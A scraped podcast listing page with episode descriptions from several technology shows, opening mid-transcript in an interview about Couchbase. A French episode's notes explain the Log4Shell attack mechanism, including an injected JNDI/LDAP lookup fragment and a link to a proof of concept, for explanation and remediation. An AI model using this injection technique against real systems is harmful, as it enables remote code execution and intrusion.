with the other cabin crew members that are around, right, in flight, and then when I land, I want to sync that data backup to the maintenance people. So, you need a database that's able to operate on a device with no connection, and then being able to synchronize backup to a cloud database that is then collecting data from all the other flights around the world.Corey: Synchronization sounds super easy until you actually try and do it, and then, “Oh, wow.” It's like, you could cut to pieces by the edge cases.Chris: And then people go, “Well, there's no problem. There's internet everywhere these days.” Yeah, sure there is. [laugh]. You get disconnected all of the time.Corey: Not to name names. This is very evocative, an earlier episode of this show I had with Tyler Slove, who's a senior manager over at United Airlines, about specifically how they're approaching a lot of their own reimagining and the rest. It's a fascinating use case, and as someone who's a bit of a travel geek himself—you know, in the before times—that's always an area of intense interest because it's… I'm sorry, I'm still a little boy at heart; it's magic to me. You get on a plane, you go somewhere else, close the doors, it opens it up, and you're on the other side of the world. And now there's internet on it? Oh, my God, who would have imagined such a thing?Chris: Uh-huh. But that's changing the experience for people. It's just really fascinating.Corey: Completely. And it's empowering and unlocking that experience you're talking about of being able to sync between the crews, about handling all this stuff behind the scenes. Everyone loves to complain about airlines because no one knows really how to run the massive logistical part of an airline. But the WiFi was a little bit slow or the food was cold; well, that's something I know how to complain about Twitter.Chris: [laugh].Corey: It becomes this idea of almost a bikeshed problem expression, where it's, “Oh, yeah. I'm just going to complain about things I can wrap my head around.” Yeah.Chris: I was talking to somebody recently, and they were—swapping topics a little bit—and they were like, so—they were talking about innovation on some new web application that they built. And I literally have to explain them, and I said, “Well, if you think of it, the underlying whole technology stack that's behind this for high-scale e-commerce, it's sophisticated, right, because people will literally walk away from a page, an application, a mobile app, if they don't get an instant response time. And that request has to literally travel, physically, quite a fair amount of distance, talk to multiple different types of technology, answer to that question, then come back to you instantly.” The sheer amount of technology that's involved here of moving that data around is a complicated architectural problem to fix. A database only plays a small part of that. You can't be the slowest player in the party.Corey: No. And that is always the challenge is that when you're looking at different use cases, there's always a constraint, and how that constraint winds up manifesting in different ways, if it's not the thing that's slowing things down, it's also not where the attention goes. If you have a single thing like, the database for example, slowing things down, everyone cares about improving databases, people focusing on, “Well, we're going to improve the JavaScript load time on the website,” that's not the problem. Find the bottleneck and focus on it. And although I'm generally a fan of picking a database and using that as a general-purpose thing until it makes sense not too—much like I am cloud providers—[audio break 00:35:54]Corey: —journey personally, where's the best place to find you?Chris: Clearly, if you want to find more about Couchbase, you can obviously go to couchbase.com. You kindly pointed out you can go and look at the trial for Capella and try out the tech. You're more than welcome to do that as a free trial.If you want to contact me particularly, you find me on LinkedIn; I'm Chris Harris at Couchbase. You'll find me [unintelligible 00:36:26] with Chris Harris in general and probably find lots of them. In the UK, Chris Harris is a famous racing driver. That's not me; it's someone else. So, find me on LinkedIn, I'm sure it won't be that difficult to find what you find. Or you can find me on Twitter.Corey: And we will of course, but links to all of that into the [show notes 00:36:43]. I really want to thank you for being so generous with your time today. It's always appreciated to talk to people who actually know what they're doing.Chris: You're more than welcome. It's been great to be on the show. Thanks, Corey.Corey: Chris Harris, Vice President of Global Field Engineering at Couchbase. I'm Cloud Economist Corey Quinn, and this is Screaming in the Cloud. If you've enjoyed this podcast, please leave a five-star review on your podcast platform of choice, whereas if you've hated this podcast, please leave a five-star review on your podcast platform of choice along with an angry comment. I'm going to wind up using all of those angry comments, at one point, as a database.Corey: If your AWS bill keeps rising and your blood pressure is doing the same, then you need The Duckbill Group. We help companies fix their AWS bill by making it smaller and less horrifying. The Duckbill Group works for you, not AWS. We tailor recommendations to your business and we get to the point. Visit duckbillgroup.com to get started.Announcer: This has been a HumblePod production. Stay humble.

Cyber and Technology with Mike
12 April 2022 Cyber and Tech News

Cyber and Technology with Mike

Play Episode Listen Later Apr 12, 2022 11:21


In today's podcast we cover four crucial cyber and technology topics, including: 1.NGINX addresses flaws in the Reference for LDAP that could be exploited 2.SuperCare Health notifying patients and employees of 2021 data breach 3.Anonymous hacks Russian Ministry of Culture, leaks emails 4.Russian effort to attack electric power in Ukraine foiled I'd love feedback, feel free to send your comments and feedback to  | cyberandtechwithmike@gmail.com

The Tech Blog Writer Podcast
1940: Solving the Identity Management Crisis

The Tech Blog Writer Podcast

Play Episode Listen Later Apr 10, 2022 25:35


Wade Ellery, Senior Solution Architect at Radiant Logic, joins me on Tech Talks Daily to discuss how many organizations have an identity management crisis without realizing it and what they can do to solve the problem? For many organizations, identity data exists in multiple forms across different locations (such as LDAP, AD, SQL, and web services), which creates a fragmented infrastructure within the organization, resulting in a deceleration of the time it takes to authenticate a user and the expansion of the organization's attack surface. Many organizations see current Identity Access Management solutions as incapable of meeting the demands of scalability, performance, and security needed in the work-from-anywhere era. So, what can be done to solve the identity management crisis experienced by organizations today? We discuss how many realize too late that they suffer from a fragmented infrastructure that results in a sprawl and why digital transformation has exacerbated organizations' current identity management problem. Finally I learn more about how using identity data fabric can help solve the identity sprawl problem.

The History of Computing
The Earliest Days of Microsoft Windows NT

The History of Computing

Play Episode Listen Later Mar 24, 2022 17:55


The first operating systems as we might think of them today (or at least anything beyond a basic task manager) shipped in the form of Multics in 1969. Some of the people who worked on that then helped created Unix at Bell Labs in 1971. Throughout the 1970s and 1980s, Unix flowed to education, research, and corporate environments through minicomputers and many in those environments thought a flavor of BSD, or Berkeley Software Distribution, might become the operating system of choice on microcomputers. But the microcomputer movement had a while other plan if only in spite of the elder minicomputers. Apple DOS was created in 1978 in a time when most companies who made computers had to mail their own DOS as well, if only so software developers could built disks capable of booting the machines. Microsoft created their Disk Operating System, or MS-DOS, in 1981. They proceeded to Windows 1 to sit on top of MS-DOS in 1985, which was built in Intel's 8086 assembler and called operating system services via interrupts. That led to poor programmers locking down points in order to access memory addresses and written assuming a single-user operating system. Then came Windows 2 in 1987, Windows 3 in 1992, and released one of the most anticipated operating systems of all time in 1995 with Windows 95. 95 turned into 98, and then Millineum in 2000. But in the meantime, Microsoft began work on another generation of operating systems based on a fusion of ideas between work they were doing with IBM, work architects had done at Digital Equipment Corporation (DEC), and rethinking all of it with modern foundations of APIs and layers of security sitting atop a kernel. Microsoft worked on OS/2 with IBM from 1985 to 1989. This was to be the IBM-blessed successor of the personal computer. But IBM was losing control of the PC market with the rise of cloned IBM architectures. IBM was also big, corporate, and the small, fledgeling Microsoft was able to move quicker. Really small companies that find success often don't mesh well with really big companies that have layers of bureaucracy. The people Microsoft originally worked with were nimble and moved quickly. The ones presiding over the massive sales and go to market efforts and the explosion in engineering team size was back to the old IBM. OS/2 had APIs for most everything the computer could do. This meant that programmers weren't just calling assembly any time they wanted and invading whatever memory addresses they wanted. They also wanted preemptive multitasking and threading. And a file system since by then computers had internal hard drives. The Microsoft and IBM relationship fell apart and Microsoft decided to go their own way. Microsoft realized that DOS was old and building on top of DOS was going to some day be a big, big problem. Windows 3 was closer, as was 95, so they continued on with that plan. But they started something similar to what we'd call a fork of OS/2 today. So Gates went out to recruit the best in the industry. He hired Dave Cutler from Digital Equipment to take on the architecture of the new operating system. Cutler had worked on the VMS operating system and helped lead efforts for next-generation operating system at DEC that they called MICA. And that moment began the march towards a new operating system called NT, which borrowed much of the best from VMS, Microsoft Windows, and OS/2 - and had little baggage. Microsoft was supposed to make version 3 of OS/2 but NT OS/2 3.0 would become just Windows NT when Microsoft stopped developing on OS/2. It took 12 years, because um, they had a loooooot of customers after the wild success of first Windows 3 and then Windows 95, but eventually Cutler and team's NT would replace all other operating systems in the family with the release of Windows 2000. Cutler wanted to escape the confines of what was by then the second largest computing company in the world. Cutler worked on VMS and RSX-12 before he got to Microsoft. There were constant turf battles and arguments about microkernels and system architecture and meetings weren't always conducive with actually shipping code. So Cutler went somewhere he could. At least, so long as they kept IBM at bay. Cutler brought some of the team from Digital with him and they got to work on that next generation of operating systems in 1988. They sat down to decide what they wanted to build, using the NS OS/2 operating system they had a starting point. Microsoft had sold Xenix and the team knew about most every operating system on the market at the time. They wanted a multi-user environment like a Unix. They wanted programming APIs, especially for networking, but different than what BSD had. In fact, many of the paths and structures of networking commands in Windows still harken back to emulating those structures. The system would be slow on the 8086 processor, but ever since the days of Xerox PARC, everyone knew Moore's Law was real and that the processors would double in speed every other year. Especially since Moore was still at Intel and could make his law remain true with the 286 and 386 chips in the pipeline. They also wanted the operating system to be portable since IBM selected the Intel CPU but there were plenty of other CPU architectures out there as well. The original name for NT was to be OS/2 3.0. But the IBM and Microsoft relationship fell apart and the two companies took their operating systems in different directions. OS/2 became went the direction of Warp and IBM never recovered. NT went in a direction where some ideas came over from Windows 95 or 3.1 but mostly the team just added layers of APIs and focused on making NT a fully 32-bit version of Windows that could that could be ported to other platforms including ARM, PowerPC, and the DEC Alpha that Cutler had exposure to from his days at Digital. The name became Windows NT and NT began with version 3, as it was in fact the third installment of OS/2. The team began with Cutler and a few others, grew to eight and by the time it finally shipped as NT 3.1 in 1993 there were a few hundred people working on the project. Where Windows 95 became the mass marketed operating system, NT took lessons learned from the Unix, IBM mainframe, and VMS worlds and packed them into an operating system that could run on a corporate desktop computer, as microcomputers were called by then. The project cost $150 million, about the same as the first iPhone. It was a rough start. But that core team and those who followed did what Apple couldn't in a time when a missing modern operating system nearly put Apple out of business. Cutler inspired, good managers drove teams forward, some bad managers left, other bad managers stayed, and in an almost agile development environment they managed to break through the conflicts and ship an operating system that didn't actually seem like it was built by a committee. Bill Gates knew the market and was patient enough to let NT 3 mature. They took the parts of OS/2 like LAN Manager. They took parts of Unix like ping. But those were at the application level. The microkernel was the most important part. And that was a small core team, like it always is. The first version they shipped to the public was Windows NT 3.1. The sales people found it easiest to often say that NT was the business-oriented operating system. Over time, the Windows NT series was slowly enlarged to become the company's general-purpose OS product line for all PCs, and thus Microsoft abandoned the Windows 9x family, which might or might not have a lot to do with the poor reviews Millennium Edition had. Other aspects of the application layer the original team didn't do much with included the GUI, which was much more similar to Windows 3.x. But based on great APIs they were able to move faster than most, especially in that era where Unix was in weird legal territory, changing hands from Bell to Novell, and BSD was also in dubious legal territory. The Linux kernel had been written in 1991 but wasn't yet a desktop-class operating system. So the remaining choices most business considered were really Mac, which had serious operating system issues at the time and seemed to lack a vision since Steve Jobs left the company, or Windows. Windows NT 3.5 was introduced in 1994, followed by 3.51 a year later. During those releases they shored up access control lists for files, functions, and services. Services being similar in nearly every way to a process in Unix. It sported a TCP/IP network stack but also NetBIOS for locating computers to establish a share and a file sharing stack in LAN Manager based on the Server Message Block, or SMB protocol that Barry Feigenbaum wrote at IBM in 1983 to turn a DOS computer into a file server. Over the years, Microsoft and 3COM add additional functionality and Microsoft added the full Samba with LDAP out of the University of Michigan as a backend and Kerberos (out of MIT) to provide single sign-on services. 3.51 also brought a lot of user-mode components from Windows 95. That included the Windows 95 common control library, which included the rich edit control, and a number of tools for developers. NT could run DOS software, now they were getting it to run Windows 95 software without sacrificing the security of the operating system where possible. It kinda' looked like a slightly more boring version of 95. And some of the features were a little harder to use, like configuring a SCSI driver to get a tape drive to work. But they got the ability to run Office 95 and it was the last version that ran the old Program Manager graphical interface. Cutler had been joined by Moshe Dunie, who led the management side of NT 3.1, through NT 4 and became the VP of the Windows Operating System Division so also had responsibility for Windows 98 and 2000. For perspective, that operating system group grew to include 3,000 badged Microsoft employees and about half that number of contractors. Mark Luovsky and Lou Perazzoli joined from Digital. Jim Alchin came in from Banyan Vines. Windows NT 4.0 was released in 1996, with a GUI very similar to Windows 95. NT 4 became the workhorse of the field that emerged for large deployments of computers we now refer to as enterprise computing. It didn't have all the animation-type bells and whistles of 95 but did perform about as well as any operating system could. It had the NT Explorer to browse files, a Start menu, for which many of us just clicked run and types cmd. It had a Windows Desktop Update and a task scheduler. They released a number of features that would take years for other vendors to catch up with. The DCOM, or Distributed Component Object Modeling and Object Linking & Embedding (or OLE) was a core aspect any developer had to learn. The Telephony API (or TAPI) allowed access to the modem. The Microsoft Transaction Server allowed developers to build network applications on their own sockets. The Crypto API allowed developers to encrypt information in their applications. The Microsoft Message Queuing service allowed queuing data transfer between services. They also built in DirectX support and already had OpenGL support. The Task Manager in NT 4 was like an awesome graphical version of the top command on Unix. And it came with Internet Explorer 2 built in. NT 4 would be followed by a series of service packs for 4 years before the next generation of operating system was ready. That was Windows 5, or more colloquially called Windows 2000. In those years NT became known as NT Workstation, the server became known as NT Server, they built out Terminal Server Edition in collaboration with Citrix. And across 6 service packs, NT became the standard in enterprise computing. IBM released OS/2 Warp version 4.52 in 2001, but never had even a fraction of the sales Microsoft did. By contrast, NT 5.1 became Windows XP and 6 became Vista in while OS/2 was cancelled in 2005.

Navigating the Cloud Journey
Episode 8: Identity In The Cloud

Navigating the Cloud Journey

Play Episode Listen Later Mar 3, 2022 31:38 Transcription Available


UPDATE: We have a new podcast host - Jim Mandelbaum! We will certainly miss Mike V as Jim takes over the reins and we know he will do a bang-up job. Just listen to his fist episode here! - JonNow ... about this episode ....Ensuring  that the right person, has the right access, to the right application(s), at the right time is essential to any organization's security and operational efficiency.  And - when you move to the Cloud, your identity footprint expands and becomes even more complex to manage.In the episode, Jim speaks with Diana Volere, a Senior Security Partner at Netflix. Diana walks us through best practices for identity automation, building authoritative sources, privileged access management, why LDAP and Active Directory are not enough and discusses the new reality of how identity changes when you're in the Cloud.

Les Cast Codeurs Podcast
LCC 272 - Interview sur Log4Shell avec this

Les Cast Codeurs Podcast

Play Episode Listen Later Feb 12, 2022 105:23


Emmanuel et Arnaud reviennent sur la fameuse faille #log4shell qui a fait travailler beaucoup d'équipes Java en décembre et janvier. Enregistré le 11 février 2022 Téléchargement de l'épisode LesCastCodeurs-Episode–272.mp3 Interview Quelle est cette vulnérabilité et pourquoi est-elle si dangereuse ? CVE–2021–44228 Reportée chez Apache le 24 Novembre, Enregistrée en CVE le 26 Nov Probablement connue depuis au moins Mars 2021: https://github.com/nice0e3/log4j_POC fix 2.15.0 le 10 décembre Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints. Severity CVSS de 10 sur 10 jamais vu Back to basics: C'est quoi JNDI? the JNDI features used in configurations, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI related endpoints l'attaquant trouve une donnée utilisateur qui est loggée Pas que HTTP et injecte {JNDI:ldap pointant vers un ldap malicieux qui retour du code java sérialisé log4j deserialise et execute ce que l'on veut que log4j2-core pas api détail de Lunasec log4j zero day mitigations initiales CVE–2021–45046 2.16.0 (change des fonctionalités) le 13 décembre Apache Log4j2 Thread Context Lookup Pattern vulnerable to remote code execution in certain non-default configurations When the logging configuration uses a non-default Pattern Layout with a Context Lookup $${ctx:loginId}) attackers with control over Thread Context Map (MDC / Mapped Diagnostic Context) input data can craft malicious input data using a JNDI Lookup pattern donc on peut injected une chaine JNDI encore mais on doit savoir comment de la date utilisateur on peut pousser dans une Thread Context Map référencée par la config on alors l'attaquant a accès à la config et c'est game over Initialement on parlait de denial of services via une reference infinie probablement c'est une chemin qui n'était pas protégé des interpolations de messages et donc de l'accès JNDI CVE–2021–45105 fix dans 2.17.0 le 18 décembre recursion non controlée dans un lookup auto référentiel When the logging configuration uses a non-default Pattern Layout with a Context Lookup (for example, $${ctx:loginId} Besoin de l'attaquant control de Thread Context Map (peut etre une donnée injectée par un framework d'une entrée utilisateur changer la config log4j locale? CVE–2021–44832 2.17.1 le 27 décembre Apache Log4j2 vulnerable to RCE via JDBC Appender when attacker controls configuration malicious configuration using a JDBC Appender with a data source referencing a JNDI URI which can execute remote code. attaquant accede et modifie la config pas simple sauf si la plateforme permet la reconfiguration par un utilisateur??? log Google package analysis montre 8% de packages sur central affectés par log4j 2 niveau de dépendance transitive monte jusqu'à 9 du coup il y a neuf vendeurs qui doivent corriger leurs dépendances Toujours plus de 40% de téléchargement sur Maven central des versions impactées Log4j1 n'est pas en reste: JMSAppender JMS dit JNDI et paf on recommence JDBCAppender SQL injection FTW log4j1 n'est plus maintenue ah merde! Apache Kafka Reload4j de ceki 1.2.17 compatible voir les fixes Des exploitations ? Peu au final Car chaque usage de log4j est unique Entrée quoi est loggé etc Donc trop dur pour les script kiddies Mais dans les megasploits et autres toolkits d'attaque VMware vSphere et Hoirizon Ubiquity Solarwind etc Quel process suivre verifier la véracité de la CVE et comprendre ses vecteurs d'attaque identifier ses dépendances et donc ses soft impacté identifier les éléments fournis par l'utilisateur qui sont loggés définir le risque par software et par service appliquer le patch de sécurité et reconstruire le package déployer ou livrer chez les clients répéter pour les semaines à venir shading? :) Impact de l'industrie dans le futur La chine a tapé sur les doigts Alibaba qui n'a pas donné cette faille d'abord au gouvernement chinois The Gift of It's Your Problem Now Discussion sur le paiement et l'open source Pour un individuel l'open source est un cadeau, et donner de l'argent n'améliore pas le cadeau Injecter de la compensation financière dans un cadeau casse le cadeau et ne change pas la motivation (ou la casse) Pour une société, l'open source est un moyen de récupérer du feedback et du marketing, donc c'est une transaction et pas un cadeau Un autre article similaire burden open source maintainer colors faker mainteneur rajoute une boucle infinie dans un package modems très utilisé en protestation de non contribution (financière) 20 millions de téléchargements par semaine GitHub a bloqué son compte et nom a remis une ancienne version un peu de temps avant il s'est fait copié son idée de faker.js as a service Reflection on log4shell par diabolical developer marathon pas un sprint, on fatigue après 5 ou 6 jours a fond, donc faites des rotations comm sur le réseau, que regarder : Adding encryption, Auth/Auth, I sanitize data that goes over the wire, I sanitize input that could execute, DOS protection – backoff strategies and more. supply chain sécurisation and component governance OSS funding (hum?) Nous contacter Soutenez Les Cast Codeurs sur Patreon https://www.patreon.com/LesCastCodeurs Faire un crowdcast ou une crowdquestion Contactez-nous via twitter https://twitter.com/lescastcodeurs sur le groupe Google https://groups.google.com/group/lescastcodeurs ou sur le site web https://lescastcodeurs.com/

The News show
Your Fired, Go Workout

The News show

Play Episode Listen Later Feb 11, 2022 4:59


The LDAP bug has been fixed in latest Windows 11 update. PS5 system update will add voice commands. Get free Peloton memberships when your fired!

Cloud Security Reinvented
Why We Should Embrace Automation to Improve Security with Jonathan Jaffe

Cloud Security Reinvented

Play Episode Listen Later Jan 3, 2022 11:29


Cloud computing is changing the world as we know it. So what impact does it have on the world of security? Jonathan Jaffe is the Chief Information Security Officer at Lemonade, a full-service consumer insurance company powered by artificial intelligence and behavioral economics and driven by social good. After years of experience in information security and cybersecurity, he made the transition to the cloud through a San Francisco startup in 2018, and then in 2020 landed at Lemonade, where it's all cloud and technology. In this episode of the Cloud Security Reinvented podcast, host Andy Ellis and Jonathan Jaffe discuss how the world has changed since the rise of technology and the prevalence of the cloud. They also talk about growth opportunities in the security industry and the power of automation. Tune in to find out more about the post-cloud security era._______________________________Guest-at-a-Glance

SANS Internet Stormcenter Daily Network/Cyber Security and Information Security Stormcast

COVID-19 Themed Multistage Malware https://isc.sans.edu/forums/diary/COVID19+Themed+Multistage+Malware/25922/ Cisco SD-WAN Patches https://tools.cisco.com/security/center/publicationListing.x oPatch Selling Patches for Windows 7 https://twitter.com/0patch/status/1240602635205586945 LDAPFragger: Bypassing network restrictions using LDAP attributes https://research.nccgroup.com/2020/03/19/ldapfragger-bypassing-network-restrictions-using-ldap-attributes/

The History of Computing
Java: The Programming Language, Not The Island

The History of Computing

Play Episode Listen Later Sep 25, 2019 21:17


Welcome to the History of Computing Podcast, where we explore the history of information technology. Because understanding the past prepares us for the innovations of the future! Today we're going to look at Java. Java is an Indonesian island with over 141 million people. Java man lived there 1.7 million years ago. Wait, wrong java. The infiltration of coffee into the modern world can really trace its roots to ancient coffee forests on the Ethiopian plateau. Sufis in Yemen began importing coffee in the 1400s to make a beverage that would aid in concentration and as a kind of spiritual intoxication. Um, still the wrong java… Although caffeine certainly has a link somewhere, somehow. The history of the Java programming language dates back to early 1991. It all started at Sun Microsystems with the Stealth Project. Patrick Naughton had considered going to NeXT due to limitations in C++ and the C APIs. But he stayed to join Stealth, a secret team of engineers led by a developer Sun picked up from Carnegie Mellon named James Gosling . Stealth was formed to explore new opportunities in the consumer electronics market. This came up when Gosling was writing a program to port software from perf to vax and emulating hardware as many, many, many programers had done before him. I wonder if he realized when he went to build the first Java compiler and the original virtual machine code that would go on to write a dozen books about Java and it would consume most of his professional life. I wonder how much coffee he would have consumed if he had. They soon added Patrick Sheridan to the team. The project was later known as the “Green” project and with the advent of the web, somewhat pivoted into more of a web project. You see, Microsoft and the clones had some runaway success but Apple and other vendors were a factor in the home market. But Sun saw going down market as the future of the company. They added a few more people and rented separate offices in Menlo Park. Lisa Friendly was the first employee in the Java Products Group. Gosling would be lead engineer. John Gage would direct the project. Jonni Kanerva would write Java FAQ1. The team started to build C++ ++ —. Sun founder Bill Joy wanted a language that combined the the best parts of Mesa and C. In 1993, NCSA gave us Mozilla. That Andreessen guy was on the news saying the era of the desktop was over. These brilliant designers knew they needed an embedded application, one that could even be used in a web browser, or an applet. The language was initially called “Oak,” but was later renamed “Java” in 1995, supposedly from a list of random words but really due to massive consumption of coffee imported from the island of Java. By the way, it only aids in concentration up to a point. Then you get jumpy. Like a Halfling. It took the Java team 18 months to develop the first working version. It is unknown how much Java they drank in this time. Between the initial implementation of Oak in the fall of 1992 and the public announcement of Java in the spring of 1995, around 13 people ended up contributing to the design and evolution of the language. They were going to build a language that could sit on top of the operating systems on the market. This would allow them to be platform agnostic. In 1995, the team announced that the evolution of Mosaic, Netscape Navigator, would provide support for Java. Java gave us Write Once, Run Anywhere platform independence. You could run the code on a Mac, on Solaris, or on Windows. Java derives its syntax from C and many of the object oriented features were influenced by C++. Several of Java's defining characteristics come from—or are responses to—its predecessors. Therefore, Java was meant to build on these and become a simple, object-oriented, distributed, interpreted, robust, secure, architectural neutral, portable, high performance, multithreaded, and dynamic language. Before I forget. The "Mocha Java" blend pairs coffee from Yemen and Java to get a thick, syrupy, and highly caffeinated blend that is often found with a hint of cinnamon or clove. Similar to all other computer language, all innovation in the design of the language was driven by the need to solve a fundamental problem that the preceding languages could not solve. To start, the creation of C is considered by many to have marked the beginning of the modern age of computer languages. It successfully synthesized the conflicting attributes that had so troubled earlier languages. The result was a powerful, efficient, structured language that was relatively easy to learn. It also included one other, nearly intangible aspect: it was a programmer's language. Prior to the invention of C, computer languages were generally designed either as academic exercises or by bureaucratic committees. C was designed, implemented, and developed by real, working programmers, reflecting how they wanted to write code. Its features were honed, tested, thought about, and rethought by the people who actually used the language. C quickly attracted many followers who had a near-religious zeal for it. As such, it found wide and rapid acceptance in the programmer community. In short, C is a language designed by and for programmers, as is Java. Throughout the history of programming, the increasing complexity of programs has driven the need for better ways to manage that complexity. C++ is a response to that need in C. To better understand why managing program complexity is fundamental to the creation of C++, consider that in the early days of programming, computer programing was done by manually toggling in the binary machine instructions by use of the front panel or punching cards. As long as programs were just a few hundred instructions long, this worked. Then came Assembly and Fortran and then But as programs grew, assembly language was invented so that a programmer could deal with larger, increasingly complex programs by using symbolic representations of the machine instructions. As programs continued to grow, high-level languages were introduced that gave the programmer more tools with which to handle complexity. This gave birth to the first popular programing language; FORTRAN. Though impressive it had its shortcomings as it didn't encourage clear and easy-to-understand programs. In the 1960s structured programming was born. This is the method of programming championed by languages such as C. The use of structured languages enabled programmers to write, for the first time, moderately complex programs fairly easily. However, even with structured programming methods, once a project reaches a certain size, its complexity exceeds what a programmer can manage. Due to continued growth, projects were exceeding the limits of the structured approach. To overcome this problem, a new way to program had to be invented; it is called object-oriented programming (OOP). Object-oriented programming (OOP) is a programming methodology that helps organize complex programs through the use of inheritance, encapsulation, and polymorphism. In spite of the fact that C is one of the world's great programming languages, there is still a limit to its ability to handle complexity. Once the size of a program exceeds a certain point, it becomes so complex that it is difficult to grasp as a totality. While the precise size at which this occurs differs, depending upon both the nature of the program and the programmer, there is always a threshold at which a program becomes unmanageable. C++ added features that enabled this threshold to be broken, allowing programmers to comprehend and manage larger programs. So if the primary motivation for creating Java was the need for a platform-independent, architecture-neutral language, it was to create software to be embedded in various consumer electronic devices, such as microwave ovens and remote controls. The developers sought to use a different system to develop the language one which did not require a compiler as C and C++ did. A solution which was easier and more cost efficient. But embedded systems took a backseat when the Web took shape at about the same time that Java was being designed. Java was suddenly propelled to the forefront of computer language design. This could be in the form of applets for the web or runtime-only packages known as Java Runtime Environments, or JREs. At the time, developers had fractured into the three competing camps: Intel, Macintosh, and UNIX. Most software engineers stayed in their fortified boundary. But with the advent of the Internet and the Web, the problem that the portability of software between platforms suddenly got important in ways it hadn't been since the forming of ARPANET. Even though many platforms are attached to the Internet, users would like them all to be able to run the same program. What was once an irritating but low-priority problem had become a high-profile necessity. The team realized this pressing need and later made the switch to refocus Java from embedded, consumer electronics to Internet programming. So while the desire for an architecture-neutral programming language provided the initial spark, the Internet ultimately led to Java's large-scale success. So if Java derives much of its character from C and C++, this is by intent. The original designers knew that using familiar syntax would make their new language appealing to legions of experienced C/C++ programmers. Java also shares some of the other attributes that helped make C and C++ successful. Java was designed, tested, and refined by real, working programmers. Not scientists. Java is a programmer's language. Java is also cohesive and logically consistent. If you program well, your programs reflect it. If you program poorly, your programs reflect that, too. Put differently, Java is not a language with training wheels. It is a language for professional programmers. Java 1 would be released in 1996 for Solaris, Windows, Mac, and Linux. It was released as the Java Development Kit, or JDK, and to this day we still refer to the version we're using as JDK 11. Version 2, or 1.2 came in 1998 and with the rising popularity we had a few things that the burgeoning community needed. These included event listeners, Just In Time compilers, and change thread synchronizations. 1.3, code named Kestrel came in 2000, bringing RMI for CORBA compatibility, synthetic proxy classes, the Java Platform Debugger Architecture, Java Naming and Directory Interface in core libraries, the HostSpot JVM, and Java Sound. Merlin, or 1.4 came in 2002 bringing the frustrating regular expressions, native XML processing, logging, Non-Blocking I/O, and SSL. Tiger, or 1.5 came in 2004. This was important. We could autobox, get compile time type safety in generics, static import the static part of a class, annotations for declarative programming, and run time libraries were mapped into memory - a huge improvements to how JVMs work. Java 5 also gave us the version number change. So JDK 1.5 was officially recognized as Java 5. JDK 1.6, or Mustang, came in 2006. This was a big update, bringing monitoring and management tools, compiler access gave us programmatic access to javac and pluggable annotations allowed us to analyze code semantically as a step before javac compiles the code. WebStart got a makeover and SE 6 unified plugins with webstart. Enhanced XML services would be important (at least until he advent of son) and you could mix javascript up with Java. We also got JDBC 4, Character Large Objects, SwingWorker, JTable, better SQL datatypes, native PKI, Kerberos, LDAP, and honestly the most important thing was that it was stable. Although I've never written code stable enough to encounter their stability issues… Not enough coffee I suppose. Sun purchased Oracle in 2009. Wait, no, that's one of my Marvel What If comic book fantasies where the world was a better place. Oracle bought Sun in 2009. After ponying up $5.6 billion dollars, Oracle had a lot of tech based on Sun products and seeing Sun as an increasingly attractive acquisition target by other companies, Oracle couldn't risk someone else swooping in and buying Sun. With all the turmoil created, it took 5 years during a pretty formative time on the web, but we finally got Dolphin, or 1.7, which came in 2011 and gave us compressed, 64-bit pointers, strings in switch statements, the ability to make a binary integer and use underscores in literals, better graphics APIs, more cryptography algorithms, and a new I/O library that gave even better platform compatibilities. Spider, or 1.8, came along in 2014. We got the ability to Launch JavaFX application Jars, statically-linked JNI libraries, a new date an time API, annotation for java types, unsigned integer arithmetic, a JavaScript runtime that allowed us to embed Javascript code in apps - whether this is a good idea or not is still tbd. Lambda functions had been dropped in Java 7 so here we also got lambda expressions. And this kickstarted a pretty interesting time in the development of Java. We got 9 in 2017, 10 and 11 in 2018, 12, 13, and 14 in 2019. Of these, only 8 and 11 are LTS, or commercial Long Term Support releases, basically meaning we got the next major release after 8 in 2018 and according to my trend line should expect the next LTS in 2021 or 2022. JDK 13, when released later in 2019, will give us text blocks, Switch Expressions, improved memory management by returning unused heap memory to the OS, improves application class and data sharing, and brings back the legacy socket API. But it won't likely be an LTS release. Today there are over 45 billion active Java Virtual Machines and java remains arguably the top language for micro service, ci/cd environments, and a number of other use cases. Other languages have come. Other languages have gone. Many are better in their own right. Some are not. Java is not perfect. It was meant to reduce complexity. But as languages evolve they become more complex. A project with a million lines of code is monolithic and probably incorporates plugins or frameworks like spring security as an example, that make code even more complex. But Java is meant to reduce cyclomatic complexity, to allow for a language that is simple enough for a professional to pick up quickly and only be as complex as the quality of the code being compiled. I don't personally love Java. I respect it. And I adore high-quality programmers and their code in any language. But I've had to redo so much work because other languages have come and gone over the years that if I were to be starting a new big monolithic web-app today, I'd probably use Java every time. Which isn't to say that Java isn't useful in micro-service architectures. According to what's required from the contract testing on a service, I might use Java, Go, node, python or even the formerly hipster Ruby. Although I don't love drinking PBR… If I'm writing an Android app, I need to know Java. No matter what the lawyers say. If I'm planning on an enterprise webapp, Java needs to be in the conversation. But usually, I can do the work in a fraction of the time using something like python. But most big companies speak Java. And for good reason. Because of the write once run anywhere approach and the level of permissions a JRE needs, there have been security challenges with running Java on desktop computers. Apple deprecated Java on the Mac in 2010. Users could still instal lications and is the gold standard for those. I'm certainly not advocating going back to the 90s and running Java apps on our desktops any more. No matter what you think of Java, one thing you have to admit, the introduction of the language and the evolution have had a substantial impact on the IT industry and it will continue to do so. A great takeaway here might be that there's always a potential alternative that might be better suited for a given task. But when it comes to choosing a platform that will be there in a decade or 3, getting support, getting a team that can scale, sometimes you might end up using a solution that doesn't immediately seem as well suited to a need. But it can get the job done. As it's been doing since James Gosling and the rest of the team started the project back in the early 90s. So thank you listeners, for sticking with us through this episode of the History of Computing Podcast. We're lucky to have you.

The Byte - A Byte-sized podcast about Containers, Cloud, and Tech
Portainer - A User Interface for Managing Docker

The Byte - A Byte-sized podcast about Containers, Cloud, and Tech

Play Episode Listen Later May 8, 2019 5:13


